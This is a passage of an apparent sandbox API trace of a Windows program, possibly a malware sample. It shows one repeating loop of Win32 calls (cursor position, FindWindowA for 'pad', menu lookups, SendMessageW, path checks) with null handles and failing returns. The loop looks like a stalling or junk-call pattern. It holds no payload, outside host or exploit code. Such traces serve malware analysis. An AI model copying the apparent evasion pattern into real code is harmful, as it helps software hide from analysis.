out: pszPath=0x0) returned 0 [0027.523] PathFileExistsW (pszPath=0x0) returned 0 [0027.523] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.523] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.523] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.523] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.523] GetMenu (hWnd=0x0) returned 0x0 [0027.523] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.523] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.523] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.523] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.523] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.523] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.523] GetStockObject (i=6) returned 0x1b00018 [0027.523] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.523] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.523] PathFileExistsW (pszPath=0x0) returned 0 [0027.523] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.523] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.523] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.523] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.523] GetMenu (hWnd=0x0) returned 0x0 [0027.523] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x336) returned -1 [0027.523] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.523] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.523] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.523] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.523] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.523] GetStockObject (i=6) returned 0x1b00018 [0027.523] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.523] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.523] PathFileExistsW (pszPath=0x0) returned 0 [0027.523] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.524] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.524] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.524] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.524] GetMenu (hWnd=0x0) returned 0x0 [0027.524] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x20b) returned -1 [0027.524] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.524] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.524] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.524] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.524] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.524] GetStockObject (i=6) returned 0x1b00018 [0027.524] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.524] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.524] PathFileExistsW (pszPath=0x0) returned 0 [0027.524] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.524] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.524] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.524] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.524] GetMenu (hWnd=0x0) returned 0x0 [0027.524] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.524] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.524] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.524] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.524] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.524] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.524] GetStockObject (i=6) returned 0x1b00018 [0027.524] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.524] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.524] PathFileExistsW (pszPath=0x0) returned 0 [0027.524] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.524] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.524] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.524] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.524] GetMenu (hWnd=0x0) returned 0x0 [0027.525] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.525] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.525] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.525] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.525] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.525] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.525] GetStockObject (i=6) returned 0x1b00018 [0027.525] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.525] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.525] PathFileExistsW (pszPath=0x0) returned 0 [0027.525] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.525] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.525] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.525] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.525] GetMenu (hWnd=0x0) returned 0x0 [0027.525] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.525] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.525] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.525] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.525] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.525] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.525] GetStockObject (i=6) returned 0x1b00018 [0027.525] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.525] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.525] PathFileExistsW (pszPath=0x0) returned 0 [0027.525] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.525] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.525] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.525] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.525] GetMenu (hWnd=0x0) returned 0x0 [0027.525] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.525] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.525] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.525] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.526] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.526] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.526] GetStockObject (i=6) returned 0x1b00018 [0027.526] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.526] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.526] PathFileExistsW (pszPath=0x0) returned 0 [0027.526] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.526] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.526] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.526] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.526] GetMenu (hWnd=0x0) returned 0x0 [0027.526] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x16) returned -1 [0027.526] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.526] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.526] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.526] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.526] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.526] GetStockObject (i=6) returned 0x1b00018 [0027.526] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.526] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.526] PathFileExistsW (pszPath=0x0) returned 0 [0027.526] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.526] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.526] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.526] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.526] GetMenu (hWnd=0x0) returned 0x0 [0027.526] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.526] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.526] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.526] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.526] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.526] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.526] GetStockObject (i=6) returned 0x1b00018 [0027.526] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.527] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.527] PathFileExistsW (pszPath=0x0) returned 0 [0027.527] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.527] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.527] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.527] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.527] GetMenu (hWnd=0x0) returned 0x0 [0027.527] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x330) returned -1 [0027.527] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.527] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.527] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.527] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.527] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.527] GetStockObject (i=6) returned 0x1b00018 [0027.527] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.527] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.527] PathFileExistsW (pszPath=0x0) returned 0 [0027.527] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.527] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.527] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.527] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.527] GetMenu (hWnd=0x0) returned 0x0 [0027.527] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.528] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.528] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.528] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.528] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.528] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.528] GetStockObject (i=6) returned 0x1b00018 [0027.528] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.528] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.528] PathFileExistsW (pszPath=0x0) returned 0 [0027.528] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.528] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.528] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.528] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.528] GetMenu (hWnd=0x0) returned 0x0 [0027.528] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.528] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.528] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.528] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.528] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.528] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.528] GetStockObject (i=6) returned 0x1b00018 [0027.528] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.528] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.528] PathFileExistsW (pszPath=0x0) returned 0 [0027.528] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.528] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.528] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.528] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.528] GetMenu (hWnd=0x0) returned 0x0 [0027.528] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0xb3) returned -1 [0027.528] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.528] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.528] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.529] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.529] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.529] GetStockObject (i=6) returned 0x1b00018 [0027.529] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.529] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.529] PathFileExistsW (pszPath=0x0) returned 0 [0027.529] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.529] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.529] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.529] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.529] GetMenu (hWnd=0x0) returned 0x0 [0027.529] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.529] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.529] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.529] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.529] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.529] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.529] GetStockObject (i=6) returned 0x1b00018 [0027.529] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.529] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.529] PathFileExistsW (pszPath=0x0) returned 0 [0027.529] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.529] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.529] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.529] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.529] GetMenu (hWnd=0x0) returned 0x0 [0027.529] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.529] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.529] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.529] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.529] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.529] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.529] GetStockObject (i=6) returned 0x1b00018 [0027.529] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.530] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.530] PathFileExistsW (pszPath=0x0) returned 0 [0027.530] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.530] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.530] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.530] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.530] GetMenu (hWnd=0x0) returned 0x0 [0027.530] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.530] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.530] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.530] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.530] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.530] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.530] GetStockObject (i=6) returned 0x1b00018 [0027.530] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.530] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.530] PathFileExistsW (pszPath=0x0) returned 0 [0027.530] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.530] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.530] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.530] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.530] GetMenu (hWnd=0x0) returned 0x0 [0027.530] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x331) returned -1 [0027.530] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.530] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.530] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.530] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.530] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.530] GetStockObject (i=6) returned 0x1b00018 [0027.530] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.530] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.530] PathFileExistsW (pszPath=0x0) returned 0 [0027.530] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.530] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.531] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.531] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.531] GetMenu (hWnd=0x0) returned 0x0 [0027.531] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x3dd) returned -1 [0027.531] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.531] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.531] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.531] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.531] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.531] GetStockObject (i=6) returned 0x1b00018 [0027.531] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.531] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.531] PathFileExistsW (pszPath=0x0) returned 0 [0027.531] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.531] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.531] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.531] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.531] GetMenu (hWnd=0x0) returned 0x0 [0027.531] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x333) returned -1 [0027.531] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.531] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.531] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.531] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.531] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, param_4=1636720, param_5=0x0, param_6=0x0) returned 0 [0027.531] GetStockObject (i=6) returned 0x1b00018 [0027.531] PathCombineW (in: pszDest=0x0, pszDir=0x0, pszFile=0x0 | out: pszDest=0x0) returned 0x0 [0027.531] PathAppendA (in: pszPath=0x0, pMore=0x0 | out: pszPath=0x0) returned 0 [0027.531] PathFileExistsW (pszPath=0x0) returned 0 [0027.531] GetWindowsDirectoryA (in: lpBuffer=0x18f61c, uSize=0xff | out: lpBuffer="C:\\Windows") returned 0xa [0027.531] GetCursorPos (in: lpPoint=0x18f5e4 | out: lpPoint=0x18f5e4*(x=819, y=455)) returned 1 [0027.531] FindWindowA (lpClassName="pad", lpWindowName=0x0) returned 0x0 [0027.531] ScreenToClient (in: hWnd=0x0, lpPoint=0x18f60c | out: lpPoint=0x18f60c) returned 0 [0027.531] GetMenu (hWnd=0x0) returned 0x0 [0027.531] MenuItemFromPoint (hWnd=0x0, hMenu=0x0, ptScreen=0x335) returned -1 [0027.532] GetMenuItemID (hMenu=0x0, nPos=-1) returned 0xffffffff [0027.532] SendMessageW (hWnd=0x0, Msg=0x111, wParam=0xffff, lParam=0x0) returned 0x0 [0027.532] GetSubMenu (hMenu=0x0, nPos=-1) returned 0x0 [0027.532] GetMenuItemRect (in: hWnd=0x0, hMenu=0x0, uItem=0xffffffff, lprcItem=0x18f5f4 | out: lprcItem=0x18f5f4) returned 0 [0027.532] TrackPopupMenuEx (param_1=0x0, param_2=0x4000, param_3=1997926881, 